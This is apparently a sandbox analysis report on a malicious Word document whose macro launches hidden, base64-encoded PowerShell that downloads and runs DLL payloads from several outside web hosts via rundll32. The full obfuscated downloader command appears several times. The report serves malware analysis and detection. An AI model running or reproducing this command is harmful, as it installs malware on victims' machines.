                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: pack 2254794.docVirustotal: Detection: 30%
                    Source: pack 2254794.docReversingLabs: Detection: 32%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                    Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
                    Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2096601177.0000000002110000.00000002.00000001.sdmp
                    Source: pack 2254794.docInitial sample: OLE summary subject = backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician

                    Data Obfuscation:

                    barindex
                    Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                    Source: pack 2254794.docStream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
                    Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4
                    Obfuscated command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                    PowerShell case anomaly foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBf